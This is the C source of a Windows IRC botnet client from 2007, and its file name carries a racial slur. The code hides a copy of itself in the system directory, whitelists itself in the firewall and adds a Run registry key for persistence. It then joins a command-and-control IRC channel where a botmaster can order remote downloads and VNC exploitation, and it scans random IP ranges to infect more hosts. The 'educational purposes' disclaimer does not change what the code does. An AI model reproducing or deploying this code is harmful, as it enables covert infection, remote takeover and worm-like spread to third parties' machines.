niggerbot.c

1. /*
2.  *      niggerbot.c 2007 Ravo_5002
3.  *      This code is for educational purposes only...
4.  */
5.  
6.  
7. #include <stdio.h>
8. #include <winsock.h>
9. #include <windows.h>
10.  
11. #include "niggerbot.h"
12. #include "ftpd.h"
13. #include "vncexploit.h"
14. #include "download.h"
15. #include "config.h"
16.  
17.  
18.  
19.  
20. volatile char *LOL = "GREETZ TO #BOTTALK ON BLUEHELL... YOURE ALL LAMERS THERE! CALL THIS VIRII W32.BOTTALKSUX";
21.  
22.  
23. /* main code */
24. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
25.  
26.     char myfilename[512];
27.     char sysdir[512];
28.     GetSystemDirectory(sysdir, sizeof(sysdir));
29.     GetModuleFileName(GetModuleHandle(NULL), myfilename, sizeof(myfilename));
30.  
31.     if(strstr(myfilename, sysdir) == NULL) {
32.         char tmpfilename[512];
33.         sprintf(tmpfilename, "%s\\%s", sysdir, BOTNAME);
34.         CopyFile(myfilename, tmpfilename, FALSE);
35.         SetFileAttributes(tmpfilename,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
36.        
37.         PROCESS_INFORMATION pinfo;
38.         STARTUPINFO sinfo;
39.         memset(&pinfo, 0, sizeof(pinfo));
40.         memset(&sinfo, 0, sizeof(sinfo));
41.         sinfo.lpTitle     = "";
42.         sinfo.cb = sizeof(sinfo);
43.         sinfo.dwFlags = STARTF_USESHOWWINDOW;
44.         sinfo.wShowWindow = SW_HIDE;
45.  
46.         if (CreateProcess(tmpfilename, NULL, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
47.             Sleep(200);
48.             CloseHandle(pinfo.hProcess);
49.             CloseHandle(pinfo.hThread);
50.             ExitProcess(EXIT_SUCCESS);
51.         }
52.     }
53.     if(!(strstr(GetCommandLine(), "Ravo5002"))) {
54.         PROCESS_INFORMATION pinfo;
55.         STARTUPINFO sinfo;
56.         memset(&pinfo, 0, sizeof(pinfo));
57.         memset(&sinfo, 0, sizeof(sinfo));
58.         sinfo.lpTitle = "";
59.         sinfo.cb = sizeof(sinfo);
60.         sinfo.dwFlags = STARTF_USESHOWWINDOW;
61.         sinfo.wShowWindow = SW_HIDE;
62.  
63.         if (CreateProcess(myfilename, "Ravo5002", NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
64.             Sleep(200);
65.             CloseHandle(pinfo.hProcess);
66.             CloseHandle(pinfo.hThread);
67.             ExitProcess(EXIT_SUCCESS);
68.         }
69.     }
70.    
71.     // bot was in system dir and started with the Ravo5002 commandline option
72.     if (WaitForSingleObject(CreateMutex(NULL, FALSE, MUTEX), 3000) == WAIT_TIMEOUT) {
73.         ExitProcess(EXIT_FAILURE);
74.     }
75.  
76.     char *fwkey ="SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
77.     //char fwkey[256];
78.     //rot13(fwkey, "FLFGRZ\\PheeragPbagebyFrg\\Freivprf\\FunerqNpprff\\Cnenzrgref\\SverjnyyCbyvpl\\FgnaqneqCebsvyr\\NhgubevmrqNccyvpngvbaf\\Yvfg");
79.     // add bot to firewall
80.     HKEY hkey;
81.     char pfad[512];
82.     sprintf(pfad, "%s:*:Enabled:%s", myfilename, REGNAME);
83.     RegCreateKeyEx(HKEY_LOCAL_MACHINE, fwkey, 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkey, 0);
84.     RegSetValueEx(hkey, myfilename, 0, REG_SZ, (const unsigned char *)pfad, strlen(pfad));
85.     RegCloseKey(hkey);
86.    
87.     char *runkey = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
88.     //char runkey[256];
89.     //rot13(runkey, "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
90.     // add bot to registry startup
91.     HKEY key;
92.     RegCreateKeyEx(HKEY_LOCAL_MACHINE , runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
93.     RegSetValueEx(key, REGNAME, 0, REG_SZ, (const unsigned char *)myfilename, strlen(myfilename));
94.     RegCloseKey(key);
95.  
96.     WSADATA wsaData;
97.     if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
98.         exit(1);
99.     }
100.    
101.     SOCKET ircconn;
102.     ircconn = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
103.    
104.     if(ircconn == INVALID_SOCKET) {
105.         return 0;
106.     }
107.     HANDLE threads[THREADS];
108.     threads[0] = CreateThread(NULL,0, irc, (void *)ircconn, 0, 0);
109.     threads[1] = CreateThread(NULL,0, ftpd, (void *)ircconn, 0, 0);
110.     int i;
111.     for(i = 2; i < THREADS; i++) {
112.         threads[i] = CreateThread(NULL,0, rangescan, (void *)ircconn, 0, 0);
113.         sleep(500);
114.     }
115.     WaitForMultipleObjects( THREADS, threads, TRUE, INFINITE);
116.     for(i = 0; i < THREADS; i++) {
117.         CloseHandle(threads[i]);
118.     }
119.     WSACleanup();
120.     return 0;
121. }
122.  
123. char *randnick(void) {
124.     // shamelessly ripped from kaiten...
125.     srand(GetTickCount()+rand());
126.     char *tmp;
127.     int len=(rand()%5)+4,i;
128.     tmp=(char*)malloc(len+1);
129.     memset(tmp,0,len+1);
130.     for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
131.     return tmp;
132. }
133.  
134. void privmsg_irc(SOCKET ircconn, char *params) {
135.  
136.  
137.     char *cmd = strtok(params, " ");
138.     char *options = strtok(NULL, "\n");
139.     options = strtok(options, "\n");
140.    
141.     char buff[4096];
142.     if(strstr(cmd, "!quit")) {
143.         sprintf(buff, "QUIT :Latazz...\n");
144.         send(ircconn,buff, strlen(buff), 0);
145.         closesocket(ircconn);
146.         exit(0);
147.     }
148.     else if(strstr(cmd, "!irc")) {
149.         sprintf(buff, "%s\n", options);
150.         send(ircconn,buff, strlen(buff), 0);
151.         return;
152.     }
153.     else if(strstr(cmd, "!vnc")) {
154.         sprintf(buff, "PRIVMSG %s :Manually exploiting %s...\n", CHANNEL, options);
155.         send(ircconn,buff, strlen(buff), 0);
156.         vncscan(ircconn, options);
157.         return;
158.     }
159.     else if(strstr(cmd, "!download")) {
160.         sprintf(buff, "PRIVMSG %s :Downloading %s...\n", CHANNEL, options);
161.         send(ircconn,buff, strlen(buff), 0);
162.         download(ircconn, options);
163.         return;
164.     }
165.     else if(strstr(cmd, "!ip")) {
166.         sprintf(buff, "PRIVMSG %s :My ip is %s...\n", CHANNEL, getlocalip());
167.         send(ircconn,buff, strlen(buff), 0);
168.         return;
169.     }
170.     else if(strstr(cmd, "!version")) {
171.         sprintf(buff, "PRIVMSG %s :%s\n", CHANNEL, VERSION);
172.         send(ircconn,buff, strlen(buff), 0);
173.         return;
174.     }
175.     return;
176. }
177.  
178. unsigned long irc(void *s) {
179.  
180.     struct hostent *hp;
181.     unsigned int addr;
182.     struct sockaddr_in server;
183.     SOCKET ircconn = (SOCKET)s;
184.     char buff[4096];
185.  
186.     hp = gethostbyname(SERVER);
187.  
188.     server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
189.     server.sin_family=AF_INET;
190.     server.sin_port=htons(PORT);
191.     while(connect(ircconn,(struct sockaddr*)&server,sizeof(server))) {
192.         //printf("cant connect to ircd, lets wait...\n");
193.         sleep(2000);
194.     }
195.  
196.     char *nick = randnick();
197.     char *user = randnick();
198.     char *ident = randnick();
199.  
200.     sprintf(buff, "NICK %s\n", nick);
201.     send(ircconn,buff,strlen(buff),0);
202.     sprintf(buff, "USER %s \"%s\" \"localhost\" :%s\n", user, ident, nick);
203.     send(ircconn,buff,strlen(buff),0); 
204.     sprintf(buff, "JOIN %s\n", CHANNEL);
205.     send(ircconn,buff,strlen(buff),0);
206.    
207.     while(1) {
208.         memset(buff,0,sizeof(buff));
209.         recv(ircconn,buff,sizeof(buff),0);
210.         ircparse(ircconn, buff);
211.         //printf("%s\n", buff); // debug
212.         //Sleep(2000);
213.     }
214.     return 0;
215.  
216. }
217.  
218.  
219. void ircparse(SOCKET ircconn, char ircline[4096]) {
220.    
221.     char *first = strtok(ircline, " ");
222.     char *last = strtok(NULL, "\0");
223.     if (!first || !last)
224.         return;
225.    
226.    
227.     // normal irc functions here
228.     if(strstr(first, "PING")) {
229.         sprintf(ircline, "PONG %s\n", last);
230.         send(ircconn,ircline,strlen(ircline),0);
231.         return;
232.     }
233.    
234.     // botmaster functions here
235.     char *command = strtok(last, " ");
236.     strtok(NULL, ":");
237.     char *parameters = strtok(NULL, "\0");
238.    
239.     if(strstr(first, BOTMASTER)) {
240.         if(strstr(command, "PRIVMSG") || strstr(command, "NOTICE")) {
241.             privmsg_irc(ircconn, parameters);
242.             return;
243.         }
244.         return;
245.     }
246.    
247.     // error irc functions here
248.     else if(strstr(command, "433")) {
249.         sprintf(ircline, "NICK %s\n", randnick());
250.         send(ircconn,ircline,strlen(ircline),0);
251.         sprintf(ircline, "JOIN %s\n", CHANNEL);
252.         send(ircconn,ircline,strlen(ircline),0);
253.         return;
254.     }
255.     else if(strstr(command, "451")) {
256.         char *nick = randnick();
257.         char *user = randnick();
258.         char *ident = randnick();
259.         sprintf(ircline, "NICK %s\n",  nick);
260.         send(ircconn,ircline,strlen(ircline),0);
261.         sprintf(ircline, "USER %s \"%s\" \"localhost\" :%s\n", user, ident, nick);
262.         send(ircconn,ircline,strlen(ircline),0);   
263.         sprintf(ircline, "JOIN %s\n", CHANNEL);
264.         send(ircconn,ircline,strlen(ircline),0);
265.     }
266.    
267.     return;
268. }
269.  
270. unsigned long rangescan(void *s) {
271.  
272.     SOCKET ircconn = (SOCKET)s;
273.    
274.     // get first two octets of local ip adress.
275.     char myhostname[80];
276.     int a, b, c, d;
277.     gethostname(myhostname, sizeof(myhostname));
278.     struct hostent *phe = gethostbyname(myhostname);
279.     struct in_addr addr;
280.     memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
281.     char *localip = inet_ntoa(addr);
282.  
283.     a = atoi(strtok(localip, "."));
284.     b = atoi(strtok(NULL, "."));
285.    
286.  
287.    
288.     if(
289.         (a == 192 && b == 168) ||               // 192.168
290.         a == 10 ||                              // 10.
291.         (a == 172 && (b > 16 && b < 31)) ||     //172.16-172.31
292.         (a > 40 && a < 50) ||                   // 40.-50. (gov ranges and network 44)
293.         (a == 169) ||                           // 169. (error adress)
294.         a < 4                                   // gov adresses
295.        ) {
296.         int rangesize = rand()%4;               // 4 is the amount of ranges :)
297.         char *ranges[] = {                      // ranges to scan when internal... these ranges wont be exploited, but only shown in channel
298.             "220", "116",
299.             "200", "161",
300.             "200", "162",
301.             "200", "0"
302.         };
303.         a = atoi(ranges[rangesize*2]);
304.         b = atoi(ranges[rangesize*2+1]);
305.     }
306.     srand(GetTickCount());
307.     char ip[32];
308.     while(1) {
309.         c = rand()%253+1;
310.         d = rand()%253+1;
311.         sprintf(ip, "%d.%d.%d.%d", a, b, c, d);
312.         vncscan(ircconn, ip);
313.     }
314.     return 0;
315. }
316.  
317.  
318. char *getlocalip(void) {
319.     char myhostname[80];
320.     gethostname(myhostname, sizeof(myhostname));
321.     struct hostent *phe = gethostbyname(myhostname);
322.     struct in_addr addr;
323.     memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
324.     return inet_ntoa(addr);
325. }